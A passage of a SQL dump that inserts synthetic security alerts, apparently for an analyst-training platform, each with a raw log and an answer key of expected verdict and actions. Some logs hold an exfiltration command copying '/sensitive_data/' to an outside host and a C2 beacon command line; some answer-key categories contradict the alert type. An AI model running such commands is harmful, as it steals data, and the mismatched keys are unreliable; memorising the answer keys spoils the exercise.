NULL, 0),
(1938, 'Routine IT Vulnerability Scan Triggered Network Communication Alert', 'medium', 'Zeek', 'A network communication from an internal IP was detected communicating with multiple external IPs over various ports. This is consistent with routine vulnerability scanning by IT.', 'Data Exfil', 'T1041', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:45:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"198.51.100.12\",\"username\":\"it_admin\",\"hostname\":\"internal-scanner\",\"request_body\":\"N/A\",\"command_line\":\"N/A\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address used for scanning.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"No malicious activity reported for this IP.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"This activity matches known patterns of authorized vulnerability scanning, hence a false positive.\"}', 'Intermediate', 'NDR', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(1939, 'Misconfigured Legacy App Generated Suspicious Network Traffic', 'low', 'Corelight', 'A misconfigured legacy application on an internal server generated suspicious traffic patterns typical of C2 communication. Investigation revealed it was benign.', 'C2 Beaconing', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.0.50\",\"dst_ip\":\"203.0.113.5\",\"username\":\"app_service\",\"hostname\":\"legacy-app-server\",\"request_body\":\"N/A\",\"command_line\":\"N/A\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address associated with a known legacy application.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"No malicious activity reported.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The misconfigured app resulted in unusual traffic but was not malicious.\"}', 'Intermediate', 'NDR', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1940, 'Authorized Administrative Backup Detected as Data Exfiltration', 'medium', 'Darktrace', 'Data transfer activity from a backup server to an external storage was flagged as potential data exfiltration. Verified as a scheduled backup task.', 'Data Exfil', 'T1041', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:15:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.150\",\"dst_ip\":\"198.51.100.50\",\"username\":\"backup_admin\",\"hostname\":\"backup-server\",\"request_body\":\"N/A\",\"command_line\":\"N/A\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.150\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address used for backup operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"External storage IP, no malicious activity detected.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"Activity confirmed as legitimate due to scheduled backup tasks.\"}', 'Intermediate', 'NDR', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1941, 'Benign System Health Check Mistaken for Lateral Movement', 'low', 'Wireshark', 'Regular system health checks from a monitoring server were flagged as suspicious lateral movement within the network.', 'Lateral Movement', 'T1021', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T07:45:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.200\",\"dst_ip\":\"192.168.1.201\",\"username\":\"monitor_service\",\"hostname\":\"monitor-server\",\"request_body\":\"N/A\",\"command_line\":\"N/A\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.200\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal monitoring server IP.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.201\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"IP of internal server receiving health check.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Confirmed as benign system health checks from internal monitoring.\"}', 'Intermediate', 'NDR', 5, 1, 'ENERGY', NULL, NULL, NULL, 0),
(1942, 'Actual C2 Beaconing Detected from Compromised Internal Host', 'high', 'Suricata', 'Detected suspicious repeated connections from an internal host to a known malicious C2 server. Further investigation confirmed the host was compromised.', 'C2 Beaconing', 'T1105', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:10:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.101\",\"dst_ip\":\"203.0.113.99\",\"username\":\"user123\",\"hostname\":\"compromised-host\",\"request_body\":\"N/A\",\"command_line\":\"N/A\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP of compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for C2 server activity.\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The connection pattern and OSINT results confirm this as a true positive for C2 beaconing.\"}', 'Intermediate', 'NDR', 5, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(1943, 'Detected C2 Beaconing from Internal Host to External IP', 'critical', 'Darktrace', 'An internal host has been detected communicating with a known C2 server. The traffic pattern is consistent with beaconing activity.', 'C2 Communication', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:23:45Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"203.0.113.45\",\"hostname\":\"internal-pc-01\",\"command_line\":\"beacon.exe -connect 203.0.113.45:443\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for C2 activity\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"beacon.exe -connect 203.0.113.45:443\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Command pattern matches known C2 beaconing\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malware distribution\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The external IP is linked to a known C2 server, confirmed by multiple OSINT sources.\"}', 'Intermediate', 'NDR', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(1944, 'Routine IT Vulnerability Scan Detected as Malicious', 'medium', 'Zeek', 'A routine internal vulnerability scan was flagged as suspicious network activity due to high traffic volume.', 'Lateral Movement', 'T1021', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:45:30Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.2.15\",\"dst_ip\":\"10.0.2.25\",\"username\":\"admin_scan\",\"hostname\":\"scanner-host\",\"command_line\":\"nmap -sS 10.0.2.0/24\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Documentation\",\"verdict\":\"internal\",\"details\":\"IP belongs to internal vulnerability scanner\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"nmap -sS 10.0.2.0/24\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Command matches routine network scan pattern\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The activity was confirmed to be a scheduled vulnerability scan by the IT department.\"}', 'Intermediate', 'NDR', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1945, 'Authorized Administrative Backup Misflagged as Data Exfiltration', 'low', 'Corelight', 'A backup process transferring large data volumes to a remote site was incorrectly flagged as potential data exfiltration.', 'Data Exfil', 'T1048', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:15:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"192.168.1.200\",\"username\":\"backup_admin\",\"hostname\":\"backup-server\",\"command_line\":\"rsync -avz /data/backup 192.168.1.200:/backup\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Documentation\",\"verdict\":\"internal\",\"details\":\"IP belongs to authorized backup server\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"rsync -avz /data/backup 192.168.1.200:/backup\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Command corresponds to scheduled backup task\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The data transfer is part of a regular backup schedule, not unauthorized exfiltration.\"}', 'Intermediate', 'NDR', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1946, 'Misconfigured Legacy App Triggers Network Anomaly Alert', 'medium', 'Suricata', 'A legacy application generated unusual network traffic patterns, mistakenly identified as suspicious activity.', 'Network Anomaly', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T13:05:50Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.75\",\"dst_ip\":\"192.168.1.80\",\"hostname\":\"legacy-app-server\",\"command_line\":\"/usr/bin/legacyapp -connect 192.168.1.80\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.75\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Documentation\",\"verdict\":\"internal\",\"details\":\"IP associated with legacy application\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"/usr/bin/legacyapp -connect 192.168.1.80\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Observed traffic pattern matches known legacy application behavior\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The unusual traffic patterns are normal for this legacy application and not indicative of an attack.\"}', 'Intermediate', 'NDR', 5, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(1947, 'System Health Check Mistaken for Lateral Movement', 'medium', 'Wireshark', 'Network traffic from system health monitoring tools was incorrectly identified as lateral movement.', 'Lateral Movement', 'T1021', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.3.5\",\"dst_ip\":\"10.0.3.10\",\"username\":\"syshealth\",\"hostname\":\"monitoring-tool\",\"command_line\":\"check_health -target 10.0.3.10\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.3.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Documentation\",\"verdict\":\"internal\",\"details\":\"IP belongs to system health monitoring tool\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"check_health -target 10.0.3.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Command in line with system health checks\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The traffic was generated by legitimate system health monitoring tools, not unauthorized access.\"}', 'Intermediate', 'NDR', 5, 1, 'ENERGY', NULL, NULL, NULL, 0),
(1948, 'Routine IT Vulnerability Scanning Detected as C2 Beaconing', 'medium', 'Zeek', 'Network traffic resembling C2 beaconing was detected from an internal IP to an external server. Upon review, this was a routine vulnerability scan.', 'Data Exfil', 'T1041', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:30:45Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"198.51.100.25\",\"username\":\"scanner_user\",\"hostname\":\"scan-server\",\"command_line\":\"/usr/bin/nmap -sT -p 1-65535 198.51.100.25\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address from the network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"No malicious activity associated with this IP.\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"/usr/bin/nmap -sT -p 1-65535 198.51.100.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"clean\",\"details\":\"Command identified as routine vulnerability scan.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"Upon investigation, it was confirmed that the network traffic was generated by an authorized vulnerability scan tool.\"}', 'Intermediate', 'NDR', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(1949, 'Authorized Administrative Backup Mistaken for Data Exfiltration', 'low', 'Corelight', 'Data transfer activity to an external backup server was flagged as potential data exfiltration. This was an authorized backup process.', 'Data Exfil', 'T1041', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:45:30Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.20\",\"dst_ip\":\"203.0.113.10\",\"username\":\"backup_admin\",\"hostname\":\"backup-server\",\"command_line\":\"rsync -avz /data/backup/ user@203.0.113.10:/remote/backup/\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address from the network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP address belongs to a trusted backup service provider.\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"rsync -avz /data/backup/ user@203.0.113.10:/remote/backup/\",\"is_critical\":false,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"clean\",\"details\":\"Command matches authorized backup procedure.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"External data transfer was part of scheduled backup operations, confirmed by IT.\"}', 'Intermediate', 'NDR', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1950, 'Misconfigured Legacy App Generating Suspicious Network Traffic', 'medium', 'Suricata', 'Network traffic from a legacy application server was flagged as suspicious. The application is known to generate erratic traffic patterns.', 'Lateral Movement', 'T1021', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T13:22:10Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.2.30\",\"dst_ip\":\"192.168.2.35\",\"username\":\"legacy_app_user\",\"hostname\":\"legacy-server\",\"command_line\":\"java -jar /opt/legacy/app.jar\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address from the network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.2.35\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address from the network.\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"java -jar /opt/legacy/app.jar\",\"is_critical\":false,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"clean\",\"details\":\"Command execution is part of the legacy application operations.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The network traffic patterns are typical for this legacy application and have been documented in historical logs.\"}', 'Intermediate', 'NDR', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1951, 'Benign System Health Checks Triggering Lateral Movement Alert', 'medium', 'Wireshark', 'System health check scripts were detected as possible lateral movement. These checks are part of routine maintenance.', 'Lateral Movement', 'T1021', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T15:50:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.3.50\",\"dst_ip\":\"192.168.3.55\",\"username\":\"health_check_user\",\"hostname\":\"maintenance-server\",\"command_line\":\"python /scripts/health_check.py\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.3.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address from the network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.3.55\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address from the network.\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"python /scripts/health_check.py\",\"is_critical\":false,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"clean\",\"details\":\"Command execution is part of routine system health checks.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The processes observed are consistent with routine maintenance scripts executed by authorized personnel.\"}', 'Intermediate', 'NDR', 5, 1, 'ENERGY', NULL, NULL, NULL, 0),
(1952, 'Unauthorized Data Exfiltration Attempt Detected', 'critical', 'Darktrace', 'A large volume of data was observed being exfiltrated to an unauthorized external server. This activity was confirmed as an actual data breach attempt.', 'Data Exfil', 'T1041', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:15:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.5.10\",\"dst_ip\":\"203.0.113.100\",\"username\":\"compromised_user\",\"hostname\":\"compromised-machine\",\"command_line\":\"scp -r /sensitive_data/ user@203.0.113.100:/stolen_data/\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.5.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address from the network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for data exfiltration activities.\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"scp -r /sensitive_data/ user@203.0.113.100:/stolen_data/\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command execution matches known data exfiltration patterns.\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The data transfer to an unauthorized IP was confirmed as a malicious exfiltration attempt.\"}', 'Intermediate', 'NDR', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1953, 'Routine IT Scan Detected as Potential C2 Beaconing', 'medium', 'Zeek', 'A network scan was detected which matches the signature of C2 beaconing. The source IP belongs to the internal IT department conducting routine vulnerability assessments.', 'C2 Beaconing', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:45:32Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"10.0.0.200\",\"username\":\"it_admin\",\"hostname\":\"scanner01\",\"command_line\":\"nmap -sS 10.0.0.200\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP used for routine scanning\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"nmap -sS 10.0.0.200\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Standard Nmap command for scanning\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The alert is a false positive as the source IP belongs to the IT department performing routine scans.\"}', 'Intermediate', 'NDR', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(1954, 'Authorized Backup Traffic Mistaken for Data Exfiltration', 'medium', 'Suricata', 'Anomalous data transfer detected to an external IP, initially flagged as potential data exfiltration. Investigation reveals it is part of the scheduled backup routine to a cloud storage provider.', 'Data Exfiltration', 'T1048', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T03:27:19Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"203.0.113.50\",\"username\":\"backup_user\",\"hostname\":\"backup_server\",\"request_body\":\"\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP performing scheduled backups\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Known cloud storage provider IP\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"This alert is a false positive due to the authorized nature of the backup traffic.\"}', 'Intermediate', 'NDR', 5, 1, 'FINANCE', NULL, NULL, NULL, 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1955, 'Internal Health Check Misidentified as Lateral Movement', 'low', 'Corelight', 'A health check script execution was misidentified as lateral movement within the network. The script is part of regular system maintenance procedures.', 'Lateral Movement', 'T1021', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:15:43Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"192.168.1.30\",\"username\":\"sysadmin\",\"hostname\":\"healthcheck01\",\"command_line\":\"check_system_health.sh\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP involved in system health checks\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"check_system_health.sh\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Regular script for system health checks\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The alert is a false positive as it involves legitimate health check activities.\"}', 'Intermediate', 'NDR', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1956, 'Legacy Application Misconfiguration Triggers C2 Alert', 'high', 'Darktrace', 'Anomalous outbound traffic was detected, flagged as C2 communication. The traffic originates from a misconfigured legacy application attempting to connect to an outdated external server.', 'C2 Beaconing', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T05:33:21Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"198.51.100.10\",\"username\":\"app_user\",\"hostname\":\"legacy_app01\",\"command_line\":\"\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP from legacy application server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"External IP associated with outdated service\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"This alert is a false positive due to the legacy application\'s misconfiguration.\"}', 'Intermediate', 'NDR', 5, 1, 'RETAIL', NULL, NULL, NULL, 0),
(1957, 'Detected C2 Beaconing Activity - True Positive', 'critical', 'Wireshark', 'Suspicious beaconing activity detected from an internal host to a known malicious external IP, indicating potential C2 communication.', 'C2 Beaconing', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:55:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.75\",\"dst_ip\":\"203.0.113.99\",\"username\":\"compromised_user\",\"hostname\":\"infected_host\",\"command_line\":\"\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.75\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP showing suspicious behavior\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.99\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for C2 activities\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The alert is a true positive as it involves communication with a known malicious external IP.\"}', 'Intermediate', 'NDR', 5, 1, 'ENERGY', NULL, NULL, NULL, 0),
